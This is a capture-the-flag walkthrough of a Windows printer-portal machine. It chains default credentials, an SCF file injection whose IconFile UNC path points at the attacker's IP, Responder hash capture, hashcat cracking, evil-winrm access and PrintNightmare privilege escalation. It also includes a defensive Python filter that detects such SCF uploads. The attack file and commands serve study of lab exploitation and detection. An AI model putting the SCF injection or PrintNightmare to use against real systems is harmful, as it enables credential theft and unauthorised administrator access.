Engagement flow
Summary
This was an easy-rated machine that started off lightly: default login credentials gave us our initial foothold into the MFP printer center. From there we identified a possible SCF file injection vulnerability, which we tested and confirmed. It let us run Responder and force the server to make an NTLMv2 authentication attempt over SMB against our rogue Responder listener. We cracked the captured hash and used evil-winrm to log in to the target as the user Tony. We then pivoted and enumerated internally, learning about a Ricoh PCL6 driver that is affected by the PrintNightmare vulnerability. We faced some obstacles executing the various PrintNightmare scripts because of the PowerShell execution policy restrictions. We bypassed this by using the scripting function within Evil-WinRM to import the PrintNightmare module and invoke its functions, which got us root.
Tools used
Responder (SMB server)
Hashcat
Evil WinRM
WinPeas
Processes/Techniques
SCF injection
Hash capturing NTLMv2
Rogue server (MITM) use
Internal enumeration
PrintNightmare vulnerability
References
Enumeration
A basic nmap scan reveals three open ports. The usual suspect, port 22 for SSH, is missing. We do however have the regular port 80, plus ports 135 and 445, which suggest RPC and SMB are in use.
We perform a more in-depth scan with the -sC and -sV flags. We learn our target is running Microsoft IIS httpd 10.0. We can also see that SMB enforces authentication for guest and user access, closing the door on authenticated SMB attacks at this stage.
Web enumeration
Browsing to the web page produces a prompt requesting that we authenticate before proceeding. The prompt reveals that our target is some type of printer-related portal. Entering the default credentials admin:admin grants access. (That does not happen often; usually you have to dig default credentials out of the device manual's setup instructions.)
MFP Firmware Update Center
Our landing page is quite basic and straightforward. The only link in the top ribbon that worked is the Firmware Updates center.
Initial foothold
In this stage we performed a fair amount of research and testing, with many questions posted on the Hack The Box forum. This led to the understanding and exploration of a type of attack that was new to us: SCF file injection. SCF stands for Shell Command File. Its IconFile entry may hold a UNC path, so when Windows processes the file it reaches out over SMB to the host named in that path and authenticates to it. The two links below offer a very nice explanation.
Configure an .scf file
[Shell]
Command=2
IconFile=\\10.10.14.24\share\test.scf
[Taskbar]
Command=ToggleDesktop
Fire up Responder and confirm that its SMB server is running.
We then upload our .scf file through the MFP Firmware Update Center and click submit. Shortly afterwards we should see activity on our Responder listener.
We can see that we successfully conducted a man-in-the-middle attack: Responder posed as the file server named in the SCF, and captured the NTLMv2 authentication hash the target presented when it tried to fetch the file.
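From the defender's side, the portal's real weakness is that it accepted an arbitrary file. The following upload filter is an added example (not part of the original write-up or of any product) that parses an uploaded blob as an SCF, handles the UTF-16 encodings Windows INI files often use, and rejects any file whose [Shell] IconFile or Command points at a UNC host that is not on an allow list. The sample inputs are constructed from the .scf shown above and from Windows' benign "Show Desktop" SCF.

```python
import re
from dataclasses import dataclass, field

# \\host\share or //host/share; Explorer accepts either separator.
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")

@dataclass
class ScfVerdict:
    is_scf: bool                  # has a [Shell] section: never a valid firmware image
    malicious: bool = False       # IconFile/Command would make Explorer talk to a remote host
    reasons: list = field(default_factory=list)

def decode_upload(raw: bytes) -> str:
    """Windows INI files are often UTF-16; handle BOM'd and BOM-less LE uploads."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    text = raw.decode("utf-8", errors="replace")
    if "\x00" in text:
        text = raw.decode("utf-16-le", errors="replace")
    return text.lstrip("\ufeff")

def parse_scf(text: str) -> dict:
    """Minimal INI parse -> {section: {key: value}} with lower-cased names."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in ";#":
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip().strip('"')
    return sections

def inspect_scf(raw: bytes, allowed_hosts=()) -> ScfVerdict:
    """Flag SCF content whose [Shell] IconFile or Command names a UNC host not on the allow list."""
    shell = parse_scf(decode_upload(raw)).get("shell")
    verdict = ScfVerdict(is_scf=shell is not None)
    allowed = {h.lower() for h in allowed_hosts}
    for key in ("iconfile", "command"):
        match = UNC_RE.match((shell or {}).get(key, ""))
        if match and match.group(1).lower() not in allowed:
            verdict.malicious = True
            verdict.reasons.append(f"[Shell] {key} points at remote host {match.group(1)}")
    return verdict

# Constructed samples: the injected file from this write-up and Windows' benign "Show Desktop" SCF.
INJECTED_SCF = b"[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.24\\share\\test.scf\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
BENIGN_SCF = b"[Shell]\r\nCommand=2\r\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
```

A firmware portal should reject anything with is_scf set regardless of the host check; the malicious flag is the indicator worth alerting on, since it marks the file that would have triggered an outbound NTLM authentication.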
Crack the hash
We take this hash and run it through hashcat. First we select hashcat's NTLMv2 mode, id 5600, and combine it with the common wordlist rockyou.txt. We arrive at the password liltony.
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Initial connection
Having a valid set of credentials, we proceed to connect to the target host. SSH over port 22 is not available, but we can connect over WinRM (port 5985) using evil-winrm.
We upload and run winPEAS to help perform some initial enumeration.
Evidence 1
The Powershell history of user tony may reveal valuable information.
Directory of C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
09/28/2021 11:06 AM 134 ConsoleHost_history.txt
We take a look and simply learn that a Ricoh PCL6 printer was added using the PCL6 Universal Driver.
Evidence 2
We see that the Firewall status is set to standard profile and enabled.
Firewall status:
-------------------------------------------------------------------
Profile = Standard
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Group policy version = Windows Firewall
Remote admin mode = Disable
Evidence 3
Reviewing the firewall port configuration, we notice that port 5985 (WinRM) is allowed inbound. This is the channel our evil-winrm session is using.
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
5985 TCP Enable Inbound winrm
ICMP configuration for Domain profile:
Mode Type Description
Evidence 4
We review the hidden folders that winPEAS identified for us. We again notice the RICOH_DRV folder used by the Ricoh printer. Researching the Ricoh printer driver reveals vulnerabilities affecting various versions, including the PrintNightmare vulnerability.
Searching hidden files or folders in C:\Users home (can be slow)
C:\Users\All Users\ntuser.pol
C:\Users\All Users\RICOH_DRV
C:\Users\Default User
C:\Users\Default
C:\Users\All Users
C:\Users\tony\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2
C:\Users\tony\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1
C:\Users\tony\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2
C:\Users\tony\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1
C:\Users\tony\ntuser.pol
C:\Users\All Users\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\do_not_delete_folders
Ricoh PCL6 Vulnerability
Reading the article below provides some insight into the Ricoh printer driver attack that allows for privilege escalation.
I had some trouble getting the exploit to work and learned how to leverage WinRM to import modules. The execution policy was restricted, so I could not import the PrintNightmare functions directly from PowerShell.
To import modules into Windows by packing them into evil-winrm, I had to specify a script directory with -s when opening the WinRM connection.
└─$ evil-winrm -i 10.129.95.238 -u tony -p liltony -s /home/kali/HTB/driver/
Root
Looking at the evil-winrm menu, there are also options for a DLL loader and a binary invoker, which may work as well, but I have not tested them.
I simply called our script by typing exploit.ps1 at the WinRM command line. Here we can see the PrintNightmare functions being added; they are listed under get_nightmare_dll.
From here we called the Invoke-Nightmare function, and it executed successfully, creating a local administrator account named 'adm1n' with the password 'P@ssw0rd'.
We then used evil-winrm to connect with the new credentials created by the PrintNightmare exploit.